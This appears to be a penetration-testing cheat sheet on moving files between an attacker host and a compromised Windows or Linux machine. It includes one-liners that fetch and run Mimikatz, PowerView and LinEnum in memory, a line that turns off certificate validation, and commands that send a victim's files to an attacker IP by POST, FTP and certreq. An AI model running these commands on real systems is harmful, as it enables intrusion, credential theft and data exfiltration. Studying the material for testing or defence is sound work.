Pentesting - Transfer Files

It is crucial to know different methods for transferring files between different devices, whether they have the same or different operating systems.

Winrm: Tool Evil-winrm

WinRM (Windows Remote Management) is a remote management protocol in the Windows operating system that allows administrators to remotely execute commands and manage Windows-based systems. It enables secure communication and automation between Windows machines, making it a valuable tool for remote administration and configuration tasks.

Command to connect:

evil-winrm <IP> -u <user> -p <password>

Upload a file:

upload <pathLocalFile> <PathRemoteFile>

Download a file:

download <PathRemoteFile> <pathLocalFile>

SCP (Windows)

Syntax:

scp [options] [source] [destination]

scp <LOCAL-FILE> <REMOTE-USERNAME>@<REMOTE-SERVER-NAME>:/pathRemote

For example, to copy a file named “example.txt” from the local machine to a remote server with the IP address “remote-server” and store it in the “/home/user/” directory, the command would be:

scp example.txt user@remote-server:/home/user/

Init a Python server

Execute in attack machine:

python3 -m http.server <port>

To download a file from attack machine to victim machine with wget:

wget http://<IP-attack>:<port-attack>/<file.txt>

With Curl:

curl -o </tmp/outputFile.txt> <http://IP-attack/file.txt>

With Powershell:

 Invoke-WebRequest -Uri "<pathAttacker>" -OutFile "<pathVictim>"

Downloads files with SMB

We need to create an SMB server in the attack machine with smbserver.py from Impacket and then use copy, move, PowerShell Copy-Item, or any other tool that allows connection to SMB.

Create an SMB Server

Example:

sudo impacket-smbserver share -smb2support <pathSMBshare>

Create the SMB server with a username and password

Example:

sudo impacket-smbserver share -smb2support <pathSMBshare> -user <user> -password <password>

Mount the SMB server with username and password

Example:

net use n: \\<pathSMBshare> /user:<user> <password>

and then, copy a file:

copy n:\<file>

Copy a file from the SMB server

Example to download a file from the SMB server to the current working directory, we can use the following command:

copy \\<pathFile>

Example:

copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\

Download files with Python2 and Python3

Example with Python2:

python2.7 -c 'import urllib;urllib.urlretrieve ("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'

Example with Python3:

python3 -c 'import urllib.request;urllib.request.urlretrieve("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'

Download Files with PHP

Let’s see some examples of downloading files using PHP.

Download content with PHP

Example with File_get_contents():

php -r '$file = file_get_contents("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);'

Example with Fopen():

php -r 'const BUFFER = 1024; $fremote = 
fopen("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "rb"); $flocal = fopen("LinEnum.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'

Example - PHP Download a File and Pipe it to Bash:

php -r '$lines = @file("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); foreach ($lines as $line_num => $line) { echo $line; }' | bash

Download Files with other Programming Languages

Ruby

Download a File:

ruby -e 'require "net/http"; File.write("LinEnum.sh", Net::HTTP.get(URI.parse("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh")))'

Perl

Download a File:

perl -e 'use LWP::Simple; getstore("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh");'

JavaScript

Download a File:

cscript.exe /nologo wget.js https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView.ps1

Download Files with Powershell

File download with the method DownloadFile

Syntax:

(New-Object Net.WebClient).DownloadFile('<TargetFileURL>','<OutputFileName>')

Other method is DownloadFileAsync:

(New-Object Net.WebClient).DownloadFileAsync('<TargetFileURL>','<OutputFileName>')

Example to download PowerView:

(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1','C:\Users\Public\Downloads\PowerView.ps1')

File download with method DownloadString

Example downloading Mimikatz:

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')

(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1') | IEX

Method Invoke-WebRequest:

Example downloading PowerView:

Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1

Common Errors with PowerShell:

There is a common error in PowerShell downloads related to the secure SSL/TLS channel if the certificate is not trusted. That error can be bypassed.

Example downloading PSUpload:

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

Example to Upload a File:

Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts

PowerShell Base64 Web Upload:

Another way to use PowerShell and base64 encoded files for upload operations is by using Invoke-WebRequest or Invoke-RestMethod together with Netcat. We use Netcat to listen in on a port we specify and send the file as a POST request. Finally, we copy the output and use the base64 decode function to convert the base64 string into a file.

Example:

$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))

Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64

We catch the base64 data with Netcat and use the base64 application with the decode option to convert the string to the file.

nc -lvnp 8000

echo <base64> | base64 -d -w 0 > hosts

Curl

A file can be uploaded using the PUT method with the curl command:

curl -T '<file.txt>' 'http://<IP>'

And rename it to an executable file using the MOVE method with the curl command:

curl -X MOVE --header 'Destination:http://<IP>/<newName>''http://<IP>/<oldName>'

Netcat

Attack host - sending file to compromised machine

Example:

nc -q 0 <IP> <port> < <fileToTransfer.exe>

Compromised machine connect to ncat to receive the file

Example:

ncat <IP> <port> --recv-only > <fileToTransfer.exe>

Share Folder with RDP

Mounting a Linux folder

Example with rdesktop:

rdesktop <IP> -d <domain> -u <user> -p '<password>' -r disk:linux='<pathFolder>'

Example with xfreerdp:

xfreerdp /v:<IP> /d:<domain> /u:<user> /p:'<password>' /drive:<nameFolder>,<pathFolder>

Winscp

It is a graphical SFTP client for Windows that uses SSH. I used it to connect to SSH and download files to windows from the remote SSH.

Putty

Connect from windows to remote SSH.

SSH Downloads

Enabling the SSH server

sudo systemctl enable ssh

Starting the SSH server

sudo systemctl start ssh

Checking for SSH Listening Port

netstat -lnpt

Now we can begin transferring files. For example with SCP:

Example:

scp plaintext@192.168.49.128:/root/myroot.txt .

Download Files with FTP

Another way to transfer files is using FTP (File Transfer Protocol), which use port TCP/21 and TCP/20. We can use the FTP client or PowerShell Net.WebClient to download files from an FTP server.

Installing the FTP Server Python3 Module - pyftpdlib

We can configure an FTP Server in our attack host using Python3 pyftpdlib module.

It can be installed with the following command:

sudo pip3 install pyftpdlib

Setting up a Python3 FTP Server

Then we can specify port number 21 because, by default, pyftpdlib uses port 2121. Anonymous authentication is enabled by default if we don’t set a user and password.

sudo python3 -m pyftpdlib --port 21

Transfering Files from an FTP Server Using PowerShell

After the FTP server is set up, we can perform file transfers using the pre-installed FTP client from Windows or PowerShell Net.WebClient.

(New-Object Net.WebClient).DownloadFile('ftp://<IP>/<file>', '<newNameFile>')

When we get a shell on a remote machine, we may not have an interactive shell. If that’s the case, we can create an FTP command file to download a file. First, we need to create a file containing the commands we want to execute and then use the FTP client to use that file to download that file.

Create a Command File for the FTP Client and Download the Target File

Example:

echo open <IP> > ftpcommand.txt

echo USER <user> >> ftpcommand.txt

echo binary >> ftpcommand.txt

echo GET <file.txt> >> ftpcommand.txt

echo bye >> ftpcommand.txt

ftp -v -n -s:ftpcommand.txt

open <IP>

USER <user>

GET <file.txt>

bye

more <file.txt>

FTP Uploads

Uploading files using FTP is very similar to downloading files. We can use PowerShell or the FTP client to complete the operation. Before we start our FTP Server using the Python module pyftpdlib, we need to specify the option --write to allow clients to upload files to our attack host.

sudo python3 -m pyftpdlib --port 21 --write

Now let’s use the PowerShell upload function to upload a file to our FTP Server.

PowerShell Upload File:

(New-Object Net.WebClient).UploadFile('ftp://192.168.49.128/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')

Example - Create a Command File for the FTP Client to Upload a File:

echo open 192.168.49.128 > ftpcommand.txt

echo USER anonymous >> ftpcommand.txt

echo binary >> ftpcommand.txt

echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt

echo bye >> ftpcommand.txt

ftp -v -n -s:ftpcommand.txt

open 192.168.49.128

USER anonymous

PUT c:\windows\system32\drivers\etc\hosts

bye

Execute Files without downloading

Example downloading LinEnum with bash:

curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash

Example download script with Python:

wget -qO- https://raw.githubusercontent.com/master/Scripts/helloworld.py | python3

Certutil

Casey Smith found that Certutil can be used to download arbitrary files. It is available in all Windows versions and has been a popular file transfer technique, serving as a defacto wget for Windows. However, the Antimalware Scan Interface (AMSI) currently detects this as malicious Certutil usage.

Download a file with Certutil

Example:

certutil.exe -verifyctl -split -f http://<file>

Bitsadmin

The Background Intelligent Transfer Service (BITS) can be used to download files from HTTP sites and SMB shares.

Syntax:

bitsadmin /transfer n http://<IP-attack>:<port-attack> <pathDestination>

Example Download with Powershell:

Import-Module bitstransfer; Start-BitsTransfer -Source "http://10.10.10.32/nc.exe" -Destination "C:\Temp\nc.exe"

Example Upload: with Powershell

Start-BitsTransfer "C:\Temp\bloodhound.zip" -Destination "http://10.10.10.132/uploads/bloodhound.zip" -TransferType Upload -ProxyUsage Override -ProxyList PROXY01:8080 -ProxyCredential INLANEFREIGHT\svc-sql

For example, to create a new BITS job named “MyJob” to download a file from a remote URL, you can use the following command:

bitsadmin /create /download MyJob http://example.com/file.txt C:\destination\file.txt

This will create a BITS job named “MyJob” to download the file from “http://example.com/file.txt” and save it to “C:\destination\file.txt”.

CertReq

It is a tool for Windows CertReq.exe

We need to listen on a port on our attack host for incoming traffic using Netcat and then execute certreq.exe to upload a file.

Example - upload a file

Example:

certreq.exe -Post -config http://<IP-attack>/ c:\<IP-Destination>

File received in our Netcat session:

Example:

sudo nc -lvnp <port>

Meterpreter Session (Metasploit)

Command to Download a File:

download <file>

Command to Upload a File:

upload <file>